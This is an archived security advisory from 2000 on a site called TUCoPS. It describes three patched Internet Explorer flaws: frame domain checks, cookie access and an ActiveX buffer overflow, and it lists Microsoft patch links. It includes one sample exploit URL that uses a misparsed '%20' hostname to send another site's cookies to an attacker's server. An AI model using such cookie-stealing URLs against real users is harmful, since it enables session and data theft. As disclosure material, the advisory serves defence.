TUCoPS :: Browsers :: expl1318.htm

MSIE Frame Domain Verification, Unauthorized Cookie Access and Malformed Component Attribute
18th May 2000 [SBWID-1318]
COMMAND

	Frame Domain Verification,  Unauthorized  Cookie  Access  and  Malformed
	Component Attribute
	

	

SYSTEMS AFFECTED

	    Microsoft Internet Explorer 4.0, 4.01, 5.0 and 5.01

	

	

PROBLEM

	    Following is a  based on a  Security Bulletin from  the Microsoft.

	    The three  security vulnerabilities  eliminated by  this patch are

	    unrelated to each other  except by the fact  that they all   occur

	    in the  same .dll.   We have  packaged them  together for customer

	    convenience.  The vulnerabilities are:

	

	    - \"Frame Domain  Verification\" vulnerability.   When a web  server

	      opens a  frame within  a window,  the IE  security model  should

	      only allow  the parent  window to  access the  data in the frame

	      if  they  are  in  the  same  domain.   However,  two  functions

	      available in IE  do not properly  perform domain checking,  with

	      the  result  that  the  parent  window  could  open a frame that

	      contains a file on the local computer, then read it.  This could

	      allow  a  malicious  web  site  operator  to  view  files on the

	      computer of a visiting user.   The web site operator would  need

	      to know (or guess) the name and location of the file, and  could

	      only view  file types  that can  be opened  in a browser window.

	      This was reported by Mead & Company\'s Andrew Nosenko.

	

	    - \"Unauthorized Cookie Access\"  vulnerability.  By design,  the IE

	      security model restricts cookies so  that they can be read  only

	      by sites within  the originator\'s domain.   However, by using  a

	      specially-malformed  URL,  it  is  possible  for a malicious web

	      site operator to gain access to another site\'s cookie and  read,

	      add or change  them.  A  malicious web site  operator would need

	      to  entice  a  visiting  user  into  clicking a link in order to

	      access  each  cookie,  and  could  not  obtain  a listing of the

	      cookies  available  on   the  visitor\'s  system.    Even   after

	      recovering a cookie, the type and amount of personal information

	      would depend on the privacy practices followed by the site  that

	      placed it there.  This was reported by Marc Slemko.

	

	 Update

	 ======

	 

	Sample exploit :
	 

	 http://passport.com%20.sub.znep.com/cgi-bin/cookies

	

	...will cause IE to connect to the  hostname  specified,  but  send  the
	cookies to the server based on the hostname before the \"%20\", in  this
	case passport.com. The \"%20\" is the URL encoded  version  of  a  space
	character. \"%20\" isn\'t the only character that  works,  there  are  a
	variety of others that are also misparsed.
	

	However secure cookies dosen\'t seemed vulnerable.
	

	 ======

	

	More details on : [http://alive.znep.com/~marcs/security/iecookie2/]
	

	

	

	    - \"Malformed Component Attribute\" vulnerability.  The code used to

	      invoke  ActiveX  components  in  IE  has an unchecked buffer and

	      could be exploited by a malicious web site operator to run  code

	      on the  computer of  a visiting  user.   The unchecked buffer is

	      only  exposed   when  certain   attributes  are   specified   in

	      conjunction with each  other.  This  was reported by  UNYUN, the

	      Shadow Penguin Security Research Group of Japan.

	

	

SOLUTION

	    Patch availability:

	
	   http://www.microsoft.com/windows/ie/download/critical/patch6.htm

	   http://www.microsoft.com/technet/security/bulletin/ms01-055.asp 

	   http://www.microsoft.com/windows/ie/downloads/critical/q312461/default.asp  

	

	    The patches require IE 4.01 Service Pack 2 or IE 5.01 to  install.

	    Customers  using  versions  prior  to  these may receive a message

	    reading  \"This  update  does  not  need  to  be  installed on this

	    system\".     This  message  is  incorrect.   More  information  is

	    available in KB article Q262509.

	

	    The  patch  also  eliminates  a  new  variant  of  the  previously

	    addressed WPAD Spoofing vulnerability

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH